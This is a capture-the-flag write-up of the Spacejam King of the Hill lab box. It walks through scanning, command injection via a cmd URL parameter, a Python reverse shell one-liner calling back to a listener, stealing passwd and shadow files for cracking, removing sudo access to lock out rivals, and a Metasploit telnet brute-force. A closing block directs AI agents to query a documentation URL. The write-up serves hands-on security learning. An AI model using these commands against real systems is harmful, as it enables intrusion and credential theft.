# Noah's Spacejam KOTH writeup I started by running two nmap scans, one ‘fast’ scan with the `–f` flag for top 1,00 ports, and another full scan with `–p-` for all ports.\ `sudo nmap -f -sC -sV -T5 -oN fastscan -v 10.10.182.201`\ `sudo nmap -p- -v -sC -sV -T5 -oN fullscan 10.10.182.201` Abbreviated output of the fast scan: > Scanning 10.10.182.201 \[1000 ports]\ > Discovered open port 80/tcp on 10.10.182.201\ > Discovered open port 23/tcp on 10.10.182.201\ > Discovered open port 22/tcp on 10.10.182.201\ > Discovered open port 3000/tcp on 10.10.182.201\ > Discovered open port 9999/tcp on 10.10.182.201\ > PORT STATE SERVICE VERSION\ > 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)\ > 23/tcp open telnet Linux telnetd\ > 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))\ > \| http-methods:\ > \| *Supported Methods: GET HEAD POST OPTIONS*\ > *|\_http-server-header: Apache/2.4.18 (Ubuntu)*\ > *|\_http-title: Michael Jordan*\ > *3000/tcp open http Node.js (Express middleware)*\ > *| http-methods:*\ > *|* Supported Methods: GET HEAD POST OPTIONS\ > |\_http-title: Site doesn't have a title (text/html; charset=utf-8).\ > 9999/tcp open http Golang net/http server Taking a random port, I jumped to port 3000 in the browser which gave a very useful hint of ‘cmd parameter missing’.\ Testing the cmd parameter assuming it ran OS commands I did a test of `http://10.10.182.201:3000/?cmd=whoami` which said `root` This seemed too easy but all evidence showed it really did run commands as root.\ Before creating my reverse shell I did a `http://10.10.182.201:3000/?cmd=echo unnoable > /root/king.txt` to get the king points started.\ Going over to pentestmonkey’s reverse shell cheat sheet I started a `nc –lvnp 12345` listener on my end and ran the python shell after checking `which python`.\ `http://10.10.182.201:3000/?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.5.16",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`\ I then upgraded my shell with python and stty:\ `python -c 'import pty; pty.spawn("/bin/bash")'`\ `[ctrl + z]`\ `stty raw –echo`\ `fg`\ Making it harder for others to follow me to root I cleared out the sudo permissions which were a straight shot to root with both users having all sudo access with no password. I tried adding a new user account but something was messing it up so I just left it and made sure not to lose my access.\ Doing some post exploitation I stole the passwd and shadow files to crack the passwords later. They are in a crackable form now by using the john unshadow tool `sudo /usr/sbin/unshadow passwd shadow > unshadow.crack`.\ I looked around the machine but only found 2 flags, a duplicate user.txt for both bunny and Jordan, and a root.txt.\ Rob had also gotten root and did some fuckery with the king.txt so it was impossible to add your name to it. I tried searching the running processes with `ps –ef | grep king.txt` but couldn’t find the loop he said he was running. I also attempted bruteforcing the telnet login, and trying an empty username/password.\ `msfconsole`\ `search telnet_login`\ `use 0`\ `options`\ `set RHOSTS 10.10.182.201`\ `set USERNAME spacejam`\ `set PASS_FILE /usr/share/wordlists/rockyou.txt`\ `run`\ But then it locked me out after like 3 tries :(\ There was also a pretty plain looking website on port 80. Running `gobuster` on that originally showed a couple of directories including /flag/. I tried running it again on that directory but didn’t get anything. I probably could have searched for php, html, or txt files with the `–x txt,html,php` gobuster flag but there wasn’t a lot of time at this point. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp.cyberdefendersprogram.com/write-ups/noah-spacejam.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.